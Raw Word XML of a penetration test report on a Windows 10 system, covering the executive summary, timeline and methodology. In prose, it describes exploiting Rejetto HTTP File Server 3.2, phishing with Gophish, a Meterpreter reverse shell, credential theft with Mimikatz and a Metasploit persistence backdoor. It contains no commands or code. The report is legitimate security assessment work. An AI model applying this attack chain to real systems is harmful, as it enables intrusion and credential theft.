            <w:tcW w:w="405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04134DC6" w14:textId="1ACE9DCA" w:rsidR="0021082F" w:rsidRPr="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Consolidated all updates into a final report, including full evidence, detection rules, and detailed analysis sections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EA8DED4" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
      <w:bookmarkStart w:id="3" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3C86BDE2" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRPr="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8"/>
    <w:p w14:paraId="7C3DEB97" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443CD5A3" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="2C9B8A7E" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Overview </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93128F" w14:textId="6C2ED6A4" w:rsidR="2C9B8A7E" w:rsidRDefault="2C9B8A7E" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This report outlines the results of our recent security assessment conducted on a Windows 10 environment. Our approach combined automated scanning with targeted manual testing to simulate realistic cyber-attacks. Based on our findings, the overall risk level is considered high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22584281" w14:textId="18E9B792" w:rsidR="2C9B8A7E" w:rsidRDefault="2C9B8A7E" w:rsidP="007D2747">
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">During our assessment, we discovered that the system was running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP File Server 3.2, a component with known vulnerabilities that could enable unauthorized access or disruption. In addition, we executed a phishing campaign that successfully deceived a user into launching a malicious payload. This resulted in </w:t>
      </w:r>
      <w:r w:rsidR="000D53FB" w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP reverse</w:t>
      </w:r>
      <w:r w:rsidR="000D53FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> providing us with remote access to the Windows 10 system. Building on this access, we then deployed a persistent backdoor using the windows/local/persistence module from Metasploit, ensuring that our access would persist even after a system reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA62AA6" w14:textId="3B3E5DA1" w:rsidR="2C9B8A7E" w:rsidRDefault="2C9B8A7E" w:rsidP="007D2747">
      <w:r w:rsidRPr="2C9B8A7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>These findings highlight the critical need for immediate remediation measures. We recommend that the vulnerabilities identified be promptly addressed to enhance the overall security posture and prevent potential data breaches or system compromises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F3EE9F" w14:textId="334FD48D" w:rsidR="2C9B8A7E" w:rsidRDefault="2C9B8A7E" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680A4E5D" w14:textId="1CB79BC2" w:rsidR="003B094A" w:rsidRPr="00900B6C" w:rsidRDefault="003B094A" w:rsidP="00900B6C"/>
    <w:p w14:paraId="53B63CE2" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve">3.2 Timeline </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a9"/>
        <w:tblW w:w="9900" w:type="dxa"/>
        <w:tblInd w:w="-115" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5400"/>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B094A" w14:paraId="0E67FB7D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="750"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18283460"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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73547372"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 xml:space="preserve">     Start Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6672DBBC"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 xml:space="preserve"> End Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B094A" w14:paraId="34E6BBC1" w14:textId="77777777" w:rsidTr="002D44D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="750"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1937AA8E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Penetration Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E07EA01" w14:textId="30B4097B" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00E27CD0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00E27CD0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00E27CD0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BB8D7D9" w14:textId="7DBFD53C" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="240"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00C62B18">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00C62B18">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00E27CD0">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44D8" w14:paraId="1C03967D" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="750"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CAECEDE" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3942F58A" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58D26F45" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="240"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="236CFBEB" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="26678685" w14:textId="77777777" w:rsidR="002D44D8" w:rsidRPr="007C0022" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F96A722" w14:textId="4B584489" w:rsidR="003B094A" w:rsidRPr="008A5CDA" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="9" w:name="_heading=h.4d34og8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>4. Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39483F23" w14:textId="03C616E1" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:bookmarkStart w:id="10" w:name="_heading=h.2s8eyo1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Our assessment of the Windows 10 environment was performed using a multi-phased approach that combined both industry-standard methodologies and custom techniques tailored to the target. Key aspects of our methodology included</w:t>
      </w:r>
      <w:r w:rsidR="00C771D9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71562A32" w14:textId="0F455E17" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F168E8">
        <w:t>Reconnaissance and Information Gathering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119DB102" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employed passive and active reconnaissance techniques to map the target’s network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C627B" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Used stealthy Nmap scanning methods (e.g., SYN scan, decoy scanning) to identify live hosts and open ports without triggering detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7607A7" w14:textId="0D27FB25" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F168E8">
        <w:t>Vulnerability Identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D105734" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reviewed the target system for known vulnerabilities, such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server 3.2 issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE2EF2" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cross-referenced findings with industry frameworks such as the OWASP Top 10, where applicable, to ensure comprehensive coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9FE31" w14:textId="398B9260" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F964D4" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Crafted and deployed targeted exploits using Metasploit, including the generation of a 64-bit reverse shell payload for Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E20B5" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conducted a phishing campaign via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that successfully tricked a user into executing the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0EEC8" w14:textId="158F656F" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F168E8">
        <w:t>Post-Exploitation and Persistence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723537DC" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leveraged the gained Meterpreter session to extract sensitive credentials using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EACDE84" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Installed a persistent backdoor using the windows/local/persistence module from Metasploit to ensure continued access after system reboots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5A5125" w14:textId="3409FF29" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F168E8">
        <w:t>Data Collection and Reporting:</w:t>
      </w:r>
    </w:p>
